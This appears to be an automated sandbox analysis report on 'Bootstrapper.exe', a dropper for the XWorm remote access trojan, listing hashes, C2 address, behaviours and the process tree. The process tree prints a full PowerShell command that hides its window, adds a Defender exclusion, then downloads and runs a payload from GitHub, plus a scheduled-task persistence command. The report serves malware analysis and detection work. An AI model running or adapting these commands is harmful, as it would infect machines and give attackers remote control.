Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/10/2024, 19:06

General

  • Target

    Bootstrapper.exe

  • Size

    90KB

  • MD5

    c25564459238aa1be41f5d9465fe51df

  • SHA1

    4751c39b3e98aaaf0c7f3a92172876f1663d5df8

  • SHA256

    540e9193d26cbac6c212f3d0d1137b30ce96b93f0d391788f582ae23e682d4bb

  • SHA512

    aa97552650f856e53d14622b90dc72087b151b4a81df81785a6d20d7a056992cd1bbdd480da8cde77035b47d739c3289f07433f9a971166f9909a32bb48daabc

  • SSDEEP

    1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfWwJOJ:/7DhdC6kzWypvaQ0FxyNTBfWh

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/cfedss/e/raw/refs/heads/main/PowerShell.exe

Extracted

Family

xworm

Version

5.0

C2

week-dictionary.gl.at.ply.gg:12466

Mutex

WIHzy7HOqD8TiFlq

Attributes
  • Install_directory

    %AppData%

  • install_file

    PowerShell.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B92E.tmp\B92F.tmp\B930.bat C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:1472
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Name Window -Namespace Console -MemberDefinition '[DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);';" "$consolePtr = [Console.Window]::GetConsoleWindow();" "[Console.Window]::ShowWindow($consolePtr, 0);" "Add-MpPreference -ExclusionPath $env:USERPROFILE;" "Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force;" "$url = 'https://github.com/cfedss/e/raw/refs/heads/main/PowerShell.exe';" "$outputFile = [System.IO.Path]::Combine($env:Temp, 'Discord.exe');" "Start-Sleep -Milliseconds 100;" "Invoke-WebRequest -Uri $url -OutFile $outputFile;" "Start-Process -FilePath $outputFile"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3676
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ceu1gz3v\ceu1gz3v.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4660
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE10.tmp" "c:\Users\Admin\AppData\Local\Temp\ceu1gz3v\CSCC651F293A49D4066BA7AF197A3769672.TMP"
              5⤵
                PID:728
            • C:\Users\Admin\AppData\Local\Temp\Discord.exe
              "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
              4⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1816
      • C:\Users\Admin\AppData\Roaming\PowerShell.exe
        C:\Users\Admin\AppData\Roaming\PowerShell.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1216
      • C:\Users\Admin\AppData\Roaming\PowerShell.exe
        C:\Users\Admin\AppData\Roaming\PowerShell.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:876

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

              Filesize

              3KB

              MD5

              556084f2c6d459c116a69d6fedcc4105

              SHA1

              633e89b9a1e77942d822d14de6708430a3944dbc

              SHA256

              88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

              SHA512

              0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

            • C:\Users\Admin\AppData\Local\Temp\B92E.tmp\B92F.tmp\B930.bat

              Filesize

              1KB

              MD5

              27bec467d9d4ef4088762686a26ca1b5

              SHA1

              82e570d313bb36fa7d41c11c2305812235135f1e

              SHA256

              f23cd13bf7fcafcc6a24776dc2c493ceb025d96287e35f409a40d29db8783de3

              SHA512

              fd9153ab272412a2ac9cab520fea3400dbc7828458719bd9c101af142cd06605ac3c8120fe63ff2941777ae09803c54e7b537b0c6a7f814aa9da9a11d632f0e7

            • C:\Users\Admin\AppData\Local\Temp\Discord.exe

              Filesize

              34KB

              MD5

              df4465e6693e489c6db32a427bbd93ec

              SHA1

              ea8ef0ae2b517e10f934b66ebefa71e2d9007aa5

              SHA256

              0c5031bae18c7e5b294b89b4b82e30c3862d1e5e4aa5fd664d7a04451dc83847

              SHA512

              4d569c1c29adadf32ff28ba53378493189c99e6e1734e1c896e52e6df89358cbfc6525a96ae1d5cbd99a909ffb7d8e88b075674f679a448a54fef961cdc16f5d

            • C:\Users\Admin\AppData\Local\Temp\RESBE10.tmp

              Filesize

              1KB

              MD5

              f5a9518176ac8a86c05019fcf60d5d53

              SHA1

              38a4693af9a3f1bd10c7baf2ad07af6e7ccbf3f3

              SHA256

              3581724ec09ad21759b311bfdaed7f1410e42dc1c4566dafa53de990d3a45e56

              SHA512

              c1fa956938030b44c7a594358de9db0cb79c027e8d39361b2c75c905916ab312515841310315fdfa96eeddf19d09d606414f03ab22703061ba71c4acf1cadd05

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_epyh3zhu.4oa.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\ceu1gz3v\ceu1gz3v.dll

              Filesize

              3KB

              MD5

              310e8d9f4a3c7052b81c551bc680793d

              SHA1

              a9efb8913f125a0e495fa8e57b4dae156442bdb2

              SHA256

              f4fd9f82c068708a2d0d2ff50d18f3e66428a86685f6d4d81a7f655c7a4c6045

              SHA512

              5416e95c917fa09af188e4d319316d6155be6967007412db7744d6519ed3188392e06357417afdd41ef117d4f53175dac82710c6ec75a27cf61bece35516b597

            • \??\c:\Users\Admin\AppData\Local\Temp\ceu1gz3v\CSCC651F293A49D4066BA7AF197A3769672.TMP

              Filesize

              652B

              MD5

              3de3d73949f7ad947aec6b91b3df0d5f

              SHA1

              53f8fb3f5c328d652f04880b848bfc4f134a8374

              SHA256

              7d1466cf233923fa9139d64f47eac52849eb0bf4cbc6b4313110d6e9ebbd0103

              SHA512

              0e2ea46e68ca97873d7853b17d4a933d7d143f1eea7db6a8a55e4f1a4856a97fcc595f1535f801231ed944bec585a0f3301f639f682cc6a78d3b99318b2250ff

            • \??\c:\Users\Admin\AppData\Local\Temp\ceu1gz3v\ceu1gz3v.0.cs

              Filesize

              289B

              MD5

              c617d0acde7fbd9a849fd6cde234d1f2

              SHA1

              94d3c83ad8cdd8abc267da0da4a24b9a43edda45

              SHA256

              e7fe5306977c98a8edaeeee034073c892dcaa742f20717f5398daf536057be35

              SHA512

              d1f74f623a7103137bd8c71c5d15a69afd1b88338f95c2e1cc80f874c2db47c593619fd9964e08e76386d3207f0a688fbea4eeb96e71f8d7d469d6f4d47aeb4e

            • \??\c:\Users\Admin\AppData\Local\Temp\ceu1gz3v\ceu1gz3v.cmdline

              Filesize

              369B

              MD5

              760ab55ab558e4bc47492562c6ed3d45

              SHA1

              818cff27735c38c729b549c260ac2b667ef3f5f0

              SHA256

              be58c2d0563d676e7276166e0d446b35f93c915f705b154852067a2b1d93b193

              SHA512

              0bc1e044d2efde83b1841903c4457d0b6b9b9b4aa8755675b5fc55ab301a1b2594ad899a9efff3730980ddd9f06843ef91864892660a2bbab599acfbe77ba3c2

            • memory/2676-42-0x0000000000750000-0x000000000075E000-memory.dmp

              Filesize

              56KB

            • memory/3676-14-0x00007FFC2DB40000-0x00007FFC2E601000-memory.dmp

              Filesize

              10.8MB

            • memory/3676-27-0x0000023BDF130000-0x0000023BDF138000-memory.dmp

              Filesize

              32KB

            • memory/3676-13-0x00007FFC2DB40000-0x00007FFC2E601000-memory.dmp

              Filesize

              10.8MB

            • memory/3676-3-0x0000023BDF100000-0x0000023BDF122000-memory.dmp

              Filesize

              136KB

            • memory/3676-43-0x00007FFC2DB40000-0x00007FFC2E601000-memory.dmp

              Filesize

              10.8MB

            • memory/3676-2-0x00007FFC2DB43000-0x00007FFC2DB45000-memory.dmp

              Filesize

              8KB